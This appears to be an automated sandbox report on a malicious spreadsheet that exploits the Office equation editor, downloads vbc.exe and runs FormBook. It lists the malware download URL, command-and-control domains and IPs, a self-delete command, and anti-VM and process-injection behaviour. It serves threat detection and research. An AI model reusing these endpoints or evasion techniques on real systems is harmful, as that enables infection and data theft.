            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: P. I.xlsxStream path 'EncryptedPackage' entropy: 7.99850778936 (max. 8.0)

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM_3Show sources
            Source: Yara matchFile source: 00000004.00000002.2139267535.00000000025FE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2824, type: MEMORY
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME8
            Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL8
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 00000000000885F4 second address: 00000000000885FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 000000000008898E second address: 0000000000088994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\Public\vbc.exeCode function: 5_2_004088C0 rdtsc
            Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\Public\vbc.exeWindow / User API: threadDelayed 788
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2292Thread sleep time: -360000s >= -30000s
            Source: C:\Users\Public\vbc.exe TID: 2832Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\Public\vbc.exe TID: 2832Thread sleep time: -75000s >= -30000s
            Source: C:\Users\Public\vbc.exe TID: 2756Thread sleep time: -41500s >= -30000s
            Source: C:\Users\Public\vbc.exe TID: 2876Thread sleep time: -60000s >= -30000s
            Source: C:\Users\Public\vbc.exe TID: 2812Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\explorer.exe TID: 2240Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\svchost.exe TID: 2948Thread sleep time: -34000s >= -30000s
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
            Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmpBinary or memory string: VMware
            Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmpBinary or memory string: VMwareHD;m
            Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmpBinary or memory string: VMWARE8
            Source: explorer.exe, 00000006.00000002.2350111291.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000006.00000000.2154896207.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
            Source: explorer.exe, 00000006.00000000.2155061516.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
            Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II8
            Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmpBinary or memory string: :m"SOFTWARE\VMware, Inc.\VMware Tools8
            Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmpBinary or memory string: QEMU8
            Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmpBinary or memory string: VMware HD;m
            Source: explorer.exe, 00000006.00000000.2154896207.0000000004234000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
            Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmpBinary or memory string: VMWARE
            Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmpBinary or memory string: :m%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\8
            Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmpBinary or memory string: VMWAREHD;m
            Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmpBinary or memory string: VMware
            Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
            Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
            Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
            Source: explorer.exe, 00000006.00000002.2350147423.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
            Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmpBinary or memory string: vmware8
            Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
            Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPort
            Source: C:\Users\Public\vbc.exeCode function: 5_2_004088C0 rdtsc
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00409B30 LdrLoadDll,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C326F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008F26F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
            Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: Debug
            Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeNetwork Connect: 101.100.209.140 80
            Source: C:\Windows\explorer.exeNetwork Connect: 104.130.255.68 80
            Source: C:\Windows\explorer.exeNetwork Connect: 74.220.199.6 80
            Source: C:\Windows\explorer.exeNetwork Connect: 198.101.172.217 80
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
            Source: C:\Windows\explorer.exeNetwork Connect: 154.215.9.186 80
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Users\Public\vbc.exeThread register set: target process: 1388
            Source: C:\Users\Public\vbc.exeThread register set: target process: 1388
            Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 1388
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
            Sample uses process hollowing techniqueShow sources
            Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 720000
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
            Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe {path}
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
            Source: explorer.exe, 00000006.00000002.2350339431.00000000006F0000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.2351266856.0000000002F30000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 00000006.00000002.2350339431.00000000006F0000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.2351266856.0000000002F30000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000006.00000002.2350111291.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000006.00000002.2350339431.00000000006F0000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.2351266856.0000000002F30000.00000002.00000001.sdmpBinary or memory string: !Progman
            Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
            Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000004.00000002.2139352712.0000000003361000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2139456624.00000000033DB000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2188116011.0000000000380000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2187983316.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2350004296.0000000000120000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2349968714.00000000000B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000004.00000002.2139352712.0000000003361000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2139456624.00000000033DB000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2188116011.0000000000380000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2187983316.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2350004296.0000000000120000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2349968714.00000000000B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsShared Modules1Windows Service1Windows Service1Masquerading111Input Capture1Security Software Discovery221Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsProcess Injection612Virtualization/Sandbox Evasion3LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol23SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information41Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncSystem Information Discovery113Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 323360 Sample: P. I.xlsx Startdate: 26/11/2020 Architecture: WINDOWS Score: 100 39 www.teddij.com 2->39 53 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 Antivirus detection for URL or domain 2->57 59 16 other signatures 2->59 11 EQNEDT32.EXE 12 2->11         started        16 EXCEL.EXE 37 17 2->16         started        signatures3 process4 dnsIp5 47 198.23.212.188, 49165, 80 AS-COLOCROSSINGUS United States 11->47 33 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 11->33 dropped 35 C:\Users\Public\vbc.exe, PE32 11->35 dropped 77 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->77 18 vbc.exe 2 5 11->18         started        37 C:\Users\user\Desktop\~$P. I.xlsx, data 16->37 dropped file6 signatures7 process8 signatures9 49 Tries to detect virtualization through RDTSC time measurements 18->49 51 Injects a PE file into a foreign processes 18->51 21 vbc.exe 18->21         started        process10 signatures11 61 Modifies the context of a thread in another process (thread injection) 21->61 63 Maps a DLL or memory area into another process 21->63 65 Sample uses process hollowing technique 21->65 67 Queues an APC in another process (thread injection) 21->67 24 explorer.exe 21->24 injected process12 dnsIp13 41 www.kapkwata.com 154.215.9.186, 49168, 80 VPSQUANUS Seychelles 24->41 43 penrosecondos-official.com 101.100.209.140, 49169, 80 VODIEN-AS-AP-LOC2VodienInternetSolutionsPteLtdSG Singapore 24->43 45 8 other IPs or domains 24->45 69 System process connects to network (likely due to code injection or exploit) 24->69 28 svchost.exe 24->28         started        signatures14 process15 signatures16 71 Modifies the context of a thread in another process (thread injection) 28->71 73 Maps a DLL or memory area into another process 28->73 75 Tries to detect virtualization through RDTSC time measurements 28->75 31 cmd.exe 28->31         started        process17

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            P. I.xlsx31%ReversingLabsDocument-Word.Exploit.CVE-2017-11882

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            5.2.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.mercadolivre.com.br/0%URL Reputationsafe
            http://www.mercadolivre.com.br/0%URL Reputationsafe
            http://www.mercadolivre.com.br/0%URL Reputationsafe
            http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
            http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
            http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
            http://www.dailymail.co.uk/0%URL Reputationsafe
            http://www.dailymail.co.uk/0%URL Reputationsafe
            http://www.dailymail.co.uk/0%URL Reputationsafe
            http://www.iis.fhg.de/audioPA0%URL Reputationsafe
            http://www.iis.fhg.de/audioPA0%URL Reputationsafe
            http://www.iis.fhg.de/audioPA0%URL Reputationsafe
            http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
            http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
            http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
            http://%s.com0%URL Reputationsafe
            http://%s.com0%URL Reputationsafe
            http://%s.com0%URL Reputationsafe
            http://198.23.212.188/reg/vbc.exe100%Avira URL Cloudmalware
            http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
            http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
            http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
            http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
            http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
            http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
            http://it.search.dada.net/favicon.ico0%URL Reputationsafe
            http://it.search.dada.net/favicon.ico0%URL Reputationsafe
            http://it.search.dada.net/favicon.ico0%URL Reputationsafe
            http://search.hanafos.com/favicon.ico0%URL Reputationsafe
            http://search.hanafos.com/favicon.ico0%URL Reputationsafe
            http://search.hanafos.com/favicon.ico0%URL Reputationsafe
            http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
            http://www.abril.com.br/favicon.ico0%URL Reputationsafe
            http://www.abril.com.br/favicon.ico0%URL Reputationsafe
            http://www.abril.com.br/favicon.ico0%URL Reputationsafe
            http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
            http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
            http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
            http://buscar.ozu.es/0%Avira URL Cloudsafe
            http://busca.igbusca.com.br/0%URL Reputationsafe
            http://busca.igbusca.com.br/0%URL Reputationsafe
            http://busca.igbusca.com.br/0%URL Reputationsafe
            http://search.auction.co.kr/0%URL Reputationsafe
            http://search.auction.co.kr/0%URL Reputationsafe
            http://search.auction.co.kr/0%URL Reputationsafe
            http://www.teleeducationforafghanistan.com/coz3/?Nxl0wV=htxXA6k0ApBh&MPxhwJ=RDRn2Ild+/wzWORBRjhdFX6pRz32wHRA4wkCN1Xv+JiXsB19Ecc8PMGycfEZfvp5cD+cKQ==0%Avira URL Cloudsafe
            http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
            http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
            http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
            http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
            http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
            http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
            http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
            http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
            http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
            http://google.pchome.com.tw/0%URL Reputationsafe
            http://google.pchome.com.tw/0%URL Reputationsafe
            http://google.pchome.com.tw/0%URL Reputationsafe
            http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
            http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
            http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
            http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
            http://www.gmarket.co.kr/0%URL Reputationsafe
            http://www.gmarket.co.kr/0%URL Reputationsafe
            http://www.gmarket.co.kr/0%URL Reputationsafe
            http://searchresults.news.com.au/0%URL Reputationsafe
            http://searchresults.news.com.au/0%URL Reputationsafe
            http://searchresults.news.com.au/0%URL Reputationsafe
            http://www.asharqalawsat.com/0%URL Reputationsafe
            http://www.asharqalawsat.com/0%URL Reputationsafe
            http://www.asharqalawsat.com/0%URL Reputationsafe
            http://search.yahoo.co.jp0%URL Reputationsafe
            http://search.yahoo.co.jp0%URL Reputationsafe
            http://search.yahoo.co.jp0%URL Reputationsafe
            http://buscador.terra.es/0%URL Reputationsafe
            http://buscador.terra.es/0%URL Reputationsafe
            http://buscador.terra.es/0%URL Reputationsafe
            http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
            http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
            http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
            http://www.iask.com/0%URL Reputationsafe
            http://www.iask.com/0%URL Reputationsafe
            http://www.iask.com/0%URL Reputationsafe
            http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
            http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
            http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
            http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
            http://www.snhdt.net/coz3/?MPxhwJ=vQj7cG2IwCBebrWG7gzNgppGgW/+TNOkvFpT9t0IQRDO6wT6r+9Ecp7CibhH0Ta6s7MNzw==&Nxl0wV=htxXA6k0ApBh0%Avira URL Cloudsafe
            http://p.zhongsou.com/favicon.ico0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            myecovet.com
            34.102.136.180
            truetrue
              unknown
              thevirginiahomesource.com
              198.101.172.217
              truetrue
                unknown
                penrosecondos-official.com
                101.100.209.140
                truetrue
                  unknown
                  www.kapkwata.com
                  154.215.9.186
                  truetrue
                    unknown
                    www.teleeducationforafghanistan.com
                    74.220.199.6
                    truetrue
                      unknown
                      reachlocal.cloudbackend.net
                      104.130.255.68
                      truetrue
                        unknown
                        www.penrosecondos-official.com
                        unknown
                        unknowntrue
                          unknown
                          www.snhdt.net
                          unknown
                          unknowntrue
                            unknown
                            www.myecovet.com
                            unknown
                            unknowntrue
                              unknown
                              www.thevirginiahomesource.com
                              unknown
                              unknowntrue
                                unknown
                                www.teddij.com
                                unknown
                                unknowntrue
                                  unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://198.23.212.188/reg/vbc.exetrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://www.teleeducationforafghanistan.com/coz3/?Nxl0wV=htxXA6k0ApBh&MPxhwJ=RDRn2Ild+/wzWORBRjhdFX6pRz32wHRA4wkCN1Xv+JiXsB19Ecc8PMGycfEZfvp5cD+cKQ==true
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.snhdt.net/coz3/?MPxhwJ=vQj7cG2IwCBebrWG7gzNgppGgW/+TNOkvFpT9t0IQRDO6wT6r+9Ecp7CibhH0Ta6s7MNzw==&Nxl0wV=htxXA6k0ApBhtrue
                                  • Avira URL Cloud: safe
                                  unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://search.chol.com/favicon.icoexplorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                    high
                                    http://www.mercadolivre.com.br/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://search.ebay.de/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                      high
                                      http://www.mtv.com/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                        high
                                        http://www.rambler.ru/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                          high
                                          http://www.nifty.com/favicon.icoexplorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                            high
                                            http://www.dailymail.co.uk/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
